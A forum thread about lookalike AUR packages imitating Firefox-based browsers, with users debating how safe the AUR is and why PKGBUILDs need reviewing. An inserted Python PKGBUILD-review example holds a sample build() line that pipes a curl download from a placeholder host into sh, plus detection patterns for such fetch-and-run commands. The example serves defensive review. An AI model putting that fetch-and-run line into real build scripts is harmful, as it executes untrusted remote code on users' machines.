Artix Linux Forum

Artix Linux => Applications & Software => Topic started by: replabrobin on 23 July 2025, 12:55:02

Title: AUR firefox might be infected
Post by: replabrobin on 23 July 2025, 12:55:02
This story (https://www.theregister.com/2025/07/22/arch_aur_browsers_compromised/) suggests Arch AUR Firefox derivatives might be compromised.
Title: Re: AUR firefox might be infected
Post by: Ramen on 23 July 2025, 16:54:02
Read carefully. It wasn't the Firefox packages. It was packages mimicking them.
https://lists.archlinux.org/archives/list/[email protected]/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/
Already solved.
Title: Re: AUR firefox might be infected
Post by: corysanin on 23 July 2025, 17:06:18
Yep, I've seen this story making the rounds. It's honestly probably not a big deal.
Quote: The compromised packages were called librewolf-fix-bin, firefox-patch-bin, and zen-browser-patched-bin
If anyone installed one of these obviously sketchy packages, you should not have an AUR helper installed on your system. It's for your own good.

Brodie Robertson on YouTube speculated that it already got installed a few times because they had some votes. I tend to believe that those numbers were artificially inflated by dummy accounts. Then the perp thought it wise to get a bunch of Redditors' eyes on it, which resulted in their prompt removal from the AUR.

Let this be a reminder to read and understand PKGBUILDs before building and installing them.
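As an added illustration of "read and understand PKGBUILDs" (example code, not from this thread or from Arch's own tooling), a small static reviewer that flags a pkgname imitating a trusted package by suffix, the pattern behind the names quoted above, together with common review points: skipped checksums, plain-http URLs, and code fetched or decoded inside prepare()/build()/package(). The trusted-name set, the suffix list and the sample PKGBUILD are assumptions constructed for the example; the file is only pattern-matched, never sourced.

```python
import re

# Assumed for the illustration: names a lookalike might imitate. A real review
# would use the official-repo package list (e.g. from `pacman -Ssq`).
TRUSTED_NAMES = {"firefox", "librewolf", "librewolf-bin", "zen-browser", "zen-browser-bin"}
LOOKALIKE_SUFFIXES = ("-fix-bin", "-patch-bin", "-patched-bin", "-fix", "-patch", "-patched")
# Build-time fetch/decode inside prepare()/build()/package() bypasses the checksummed source= array.
FETCH_RE = re.compile(r"\b(curl|wget)\b|\|\s*(ba)?sh\b|base64\s+(-d|--decode)")
# Shell functions written as name() { ... } with the closing brace at column 0.
FUNC_RE = re.compile(r"^(\w+)\(\)\s*\{(.*?)^\}", re.M | re.S)

# Constructed sample PKGBUILD for the demonstration; not a real AUR package.
SAMPLE = """pkgname=librewolf-fix-bin
source=("http://example.invalid/librewolf.tar.gz")
sha256sums=('SKIP')
build() {
  curl -s http://example.invalid/extra.sh | sh
}
package() {
  install -Dm755 librewolf "$pkgdir/usr/bin/librewolf"
}
"""

def lookalike_of(pkgname, trusted=TRUSTED_NAMES):
    """Return the trusted package that pkgname imitates by suffix, else None."""
    for suffix in LOOKALIKE_SUFFIXES:
        if pkgname.endswith(suffix):
            base = pkgname[: -len(suffix)]
            for cand in (base, base + "-bin"):
                if cand in trusted:
                    return cand
    return None

def review_pkgbuild(text, trusted=TRUSTED_NAMES):
    """Static review only: the PKGBUILD text is never sourced or executed."""
    findings = []
    m = re.search(r"^pkgname=([\w.+-]+)", text, re.M)
    name = m.group(1) if m else ""
    target = lookalike_of(name, trusted)
    if target:
        findings.append(f"pkgname '{name}' imitates trusted package '{target}'")
    if re.search(r"^\w*sums=\([^)]*\bSKIP\b", text, re.M | re.S):
        findings.append("checksum array contains SKIP: sources are not integrity-checked")
    for url in re.findall(r"http://[^\s'\")]+", text):
        findings.append(f"plain-http URL (no transport integrity): {url}")
    for fn, body in FUNC_RE.findall(text):
        if fn in ("prepare", "build", "package") and FETCH_RE.search(body):
            findings.append(f"{fn}() fetches or decodes code at build time")
    return findings
```

An empty list means nothing was flagged, not that the package is safe; the heuristics only direct a human reader to the lines worth reading first.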
Title: Re: AUR firefox might be infected
Post by: cds on 24 July 2025, 06:30:11
Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)
Title: Re: AUR firefox might be infected
Post by: mrbrklyn on 24 July 2025, 12:55:52
Let this be a reminder to read and understand PKGBUILDs before building and installing them.

These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)


really....  I have.  In fact, I get vital software I cannot live without from the AUR, not the least of which is Window Maker, the window manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...
Title: Re: AUR firefox might be infected
Post by: cds on 26 July 2025, 00:31:47
These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)

really....  I have.  In fact, I get vital software I cannot live without from the AUR, not the least of which is Window Maker, the window manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...

Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself. There was a time though, a few years back, when I wanted to move from Eagle CAD to KiCad. Back then, only really, really new KiCad had the import feature. That was about as complex as I got.
Of course, now that the import feature is standard... Oh wait, there is possibly one. Chirp - but here again, I could just go to the source.
Title: Re: AUR firefox might be infected
Post by: gripped on 26 July 2025, 00:47:45
Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself
If you just review a simple PKGBUILD, the same thing results.
Not all PKGBUILDs are simple though.
Title: Re: AUR firefox might be infected
Post by: replabrobin on 26 July 2025, 09:38:42
I have some customized packages, e.g. gvim, which I prefer to use compiled against gtk2 rather than gtk3. It's fairly easy to download the pkg repo from Artix or Arch and then make small changes to the PKGBUILD.

I think using makepkg with a modified official PKGBUILD is probably less risky and at least preserves the pacman database.

Compiling from source will scatter files about and possibly lead to confusion; as an example, I just found

Code:
$ packer -Qo /lib/pyston3.8
error: No package owns /lib/pyston3.8

I vaguely remember pyston, but 3.8 was a long time ago :(
Title: Re: AUR firefox might be infected
Post by: ####### on 26 July 2025, 14:55:19
On a Debian-based system with no AUR, building from source was quite common; the thing to do was to define the install directory to be under /usr/local during the build configuration, so you didn't touch the main system dirs and avoided problems. It can be done without the AUR, but it still won't stop the risk of installing infected software if it's in the source itself, which can happen too. Using the AUR actually adds another layer of oversight and could be seen as making things safer in some ways than picking up random code online, despite the additional risk of a compromised PKGBUILD; there are advantages and drawbacks to both approaches, I think. You could stick to only using official code and not forks, but you can make that same choice in the AUR as well.